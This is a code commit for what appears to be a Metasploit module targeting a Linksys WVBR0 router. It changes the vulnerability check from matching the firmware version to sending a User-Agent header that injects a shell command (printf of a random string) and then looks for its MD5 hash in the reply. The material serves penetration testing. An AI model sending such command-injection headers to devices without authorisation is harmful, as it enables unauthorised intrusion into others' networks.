Ensure vulnerability check cannot false positive with the power of runtime randomness

Author: headlesszeke

modules/exploits/linux/http/linksys_wvbr0_user_agent_exec_noauth.rb

@@ -48,12 +48,16 @@ def initialize(info = {})
   end
 
   def check
+    check_str = rand_text_alpha(8)
     begin
       res = send_request_raw({
         'method' => 'GET',
-        'uri' => '/'
+        'uri' => '/',
+        'headers' => {
+          'User-Agent'  => "\"; printf \"#{check_str}"
+        }
       })
-      if res && res.code == 200 && res.body.to_s =~ /Firmware Version: (1\.0\.(40|[1-3][0-9]|[0-9])\.|0\.)/  # version < 1.0.41
+      if res && res.code == 200 && res.body.to_s.include?(Rex::Text.md5(check_str))
         return Exploit::CheckCode::Vulnerable
       end
     rescue ::Rex::ConnectionError